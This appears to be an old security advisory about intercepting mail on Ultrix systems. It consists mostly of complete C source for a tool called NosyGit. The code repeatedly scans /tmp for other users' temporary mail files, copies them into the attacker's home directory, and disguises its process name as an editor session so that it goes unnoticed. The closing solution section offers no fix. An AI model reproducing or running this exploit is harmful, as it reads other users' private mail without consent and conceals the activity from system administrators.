COMMAND

    mail interception

SYSTEMS AFFECTED

    Ultrix

PROBLEM

    Following is based on NosyGit V. 3.0 (The famous Staffs Poly  Mail
    Interceptor)  written  by  written  by  TFT.   Following code will
    intercept  incoming  mail  on  Ultrix  machine.   You have to have
    'mail' directory  (in your  HOME) where  intercepted mail  will be
    stored.  Exploit follows (tested on Ultrix 4.2A):

    #include <stdio.h>
    #include <string.h>
    main(argc,argv)
    int argc;
    char *argv[];
    {
      FILE *f,*f1,*f2;
      char *sp,temp[80],filename[80],fname[80],line[80];
    /* Naughty! Make the process show up as something else */
    /*     (In this case, you're editing your .login file  !) */
      strcpy(argv[0],"e .login   ");
      mainloop:;
      f=fopen("/tmp","r");

    /* Open the control file for the /tmp temporary directory */
      nextfile:;

    /* Search for a filename in the directory beginning with 'maa'... */
      getname(f,filename);

    /* Getname returns 'EOF' in filename if no more files are found */
      if (!strcmp(filename,"EOF")) goto no_more_files;

    /* Create full pathname for file to read */
      sprintf(fname,"/tmp/%s",filename);

    /* Create full pathname for your mail directory */
      sprintf(temp,"./mail/%s",filename);

    /* If destination file exists already, don't write it */
      f1=fopen(temp,"r");
      if (f1) {
         fclose(f1);
         goto nextfile;
              }

    /* Otherwise, attempt to open source and destination files */
      f2=fopen(fname,"r");
      if (f2) f1=fopen(temp,"w");
      if (f2) {

    /* If successful, notify user, then copy file line by line */
          putchar(7);
          printf("** NosyGit ** Got some new mail, stored it in ");
          printf ("mail/%s\n",filename);
          while(sp=fgets(line,80,f2)) fprintf(f1,"%s",line);
          fclose(f1);
          fclose(f2);
              }
      goto nextfile;
    /* All files done, so close file then go back up to top */

      no_more_files:;
      fclose(f);
      goto mainloop;
    }

    getname(f,filename)
    FILE *f;
    char filename[];
    {
      int pos;
      char current;
    loop:;

    /* Find files beginning with 'maa...' */
        current=fgetc(f);if (current!=EOF && current!='m') goto loop;
        if (current==EOF) goto out;
        current=fgetc(f);if (current!=EOF && current!='a') goto loop;
        if (current==EOF) goto out;
        current=fgetc(f);if (current!=EOF && current!='a') goto loop;
        if (current==EOF) goto out;
        strcpy(filename,"maa");
        pos=3;
    next:;

    /* add all characters found to filename until invalid char reached */
    /*    (this should be the filename terminator)                     */
          current=fgetc(f);
          if (current>31) filename[pos]=current;
          pos++;
        if (current>31) goto next;
      filename[pos]=0;
      return(0);

    /* Valid filename, exit */
    out:;

    /* Invalid filename, return filename "EOF" */
      strcpy(filename,"EOF");
    }

SOLUTION

    Rather old system.   There is technological revolution,  don't you
    know that?  I'm not  sure does this affect latest  Ultrix version,
    but if it does I'm sure that there is no patch since this code has
    been around for a while.